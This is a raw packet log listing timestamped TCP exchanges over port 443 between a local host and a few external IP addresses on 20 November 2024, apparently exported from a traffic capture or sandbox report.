Nov 20, 2024 12:38:58.093375921 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.093375921 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.093389988 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.107901096 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.107928991 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.108016968 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.108052969 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.108078003 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.135618925 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.135644913 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.135694981 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.135755062 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.135771036 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.135816097 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.145788908 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.145812035 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.145859957 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.147738934 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147758961 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147814989 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147819042 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.147830963 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147875071 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147917986 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147933960 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.147945881 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.147989988 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.148231030 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.148251057 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.148346901 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.148356915 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182095051 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182116985 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182284117 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.182310104 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182744026 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182764053 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.182862997 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.182873964 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.191613913 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.191632032 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.191688061 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.191699982 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.191725016 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.225044966 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.225066900 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.225121975 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.225172997 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.225194931 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.236278057 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.236290932 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.236360073 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.236371040 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.237232924 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.237251997 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.237330914 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.237339020 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.237381935 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.238176107 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.238190889 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.238233089 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.238244057 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.238281965 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.239007950 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.239026070 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.239078999 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.239087105 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.239180088 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.275321007 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275341034 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275423050 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.275497913 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275537014 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.275721073 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275768042 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275779963 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.275794983 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.275840044 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.284238100 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.284255028 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.284327984 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.284344912 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.317692041 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.317718029 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.317783117 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.317833900 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.531337023 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.586695910 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.803347111 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.803406954 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.830907106 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.830931902 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.831011057 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839145899 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839180946 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839205980 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839224100 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839260101 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839277983 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839296103 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839332104 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839351892 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839389086 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839389086 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839389086 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839411974 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839437008 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839461088 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839482069 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839503050 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839524984 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839575052 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839581013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839607954 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839642048 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839648008 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839648008 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839682102 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839684010 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839694023 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839740992 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839742899 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839785099 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839795113 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839803934 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839823008 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839863062 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:58.839893103 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.839970112 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:58.840145111 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.047367096 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.049621105 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.153219938 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.153281927 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.153423071 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.166830063 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.166850090 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.166872978 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.166990995 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167006016 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167028904 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167093039 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167107105 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167133093 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167160034 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167177916 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167207956 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167217970 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167244911 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167268038 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167285919 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167347908 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167347908 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167365074 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167387962 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167421103 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167447090 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.167509079 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167509079 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.167589903 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.375345945 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.375688076 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.431797981 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.431868076 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.431943893 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.435777903 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.435791969 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.435822964 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.435873032 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.436000109 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.436017036 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.436058998 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.436104059 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.436147928 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.436173916 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.436252117 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.620656013 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.620698929 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.620788097 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.632966995 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.633006096 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.633049965 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.633110046 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.633153915 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.633212090 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.633270025 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.633379936 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.633459091 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.843338013 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.883693933 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.939366102 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.939412117 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.939487934 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.944502115 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.944545031 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.944591045 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.944624901 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.944690943 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.944695950 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.944745064 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:38:59.944811106 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.944910049 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:38:59.944945097 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.155343056 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.177103043 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.177180052 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.177282095 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.184319019 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.184331894 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.184381962 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.184417963 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.184487104 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.184536934 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.184552908 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.184644938 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.184756041 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.184799910 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.395342112 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.446053982 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.614083052 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.614139080 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.614206076 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.622392893 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.622411013 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622450113 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622478008 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622498989 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622539043 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.622556925 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622584105 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622617960 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622646093 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.622698069 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.622766972 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.622827053 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.831337929 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.834400892 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.857001066 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.857038975 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.857119083 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.862709999 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.862730026 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.862744093 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.862768888 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.862838030 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.862863064 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.862901926 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:00.862960100 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.863048077 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:00.863091946 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.067342997 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:01.069499969 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.411660910 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.411714077 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:01.411782026 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.417045116 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.417056084 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:01.417073965 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:01.417099953 CET	443	49721	185.61.154.28	192.168.2.6
Nov 20, 2024 12:39:01.417136908 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.417227983 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.759850025 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.768192053 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:01.929207087 CET	49721	443	192.168.2.6	185.61.154.28
Nov 20, 2024 12:39:02.015568972 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.015610933 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:02.015855074 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.016220093 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.016232967 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:02.545010090 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:02.545094013 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.547132015 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.547146082 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:02.547444105 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:02.548808098 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:02.591342926 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:03.031905890 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:03.032063007 CET	443	49756	172.67.167.249	192.168.2.6
Nov 20, 2024 12:39:03.032205105 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:03.145689964 CET	49756	443	192.168.2.6	172.67.167.249
Nov 20, 2024 12:39:04.817686081 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:04.817789078 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:04.817881107 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:04.821064949 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:04.821103096 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:05.318634987 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:05.318739891 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:05.320600986 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:05.320626974 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:05.320971966 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:05.367954969 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:05.380917072 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:05.381059885 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:05.381211996 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.277657032 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.277774096 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.277853012 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.280659914 CET	49774	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.280685902 CET	443	49774	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.382534981 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.382576942 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.382733107 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.383127928 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.383141994 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.866916895 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.867010117 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.923391104 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.923413038 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.923808098 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:06.935620070 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.935636997 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:06.935738087 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898395061 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898569107 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898641109 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.898659945 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898744106 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898789883 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.898808002 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898895025 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.898940086 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.898955107 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899068117 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899153948 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899167061 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.899173021 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899218082 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.899240971 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899410009 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.899482012 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.899488926 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.946106911 CET	49785	443	192.168.2.6	188.114.96.3
Nov 20, 2024 12:39:07.990540981 CET	443	49785	188.114.96.3	192.168.2.6
Nov 20, 2024 12:39:07.990639925 CET	443	49785	188.114.96.3	192.168.2.6
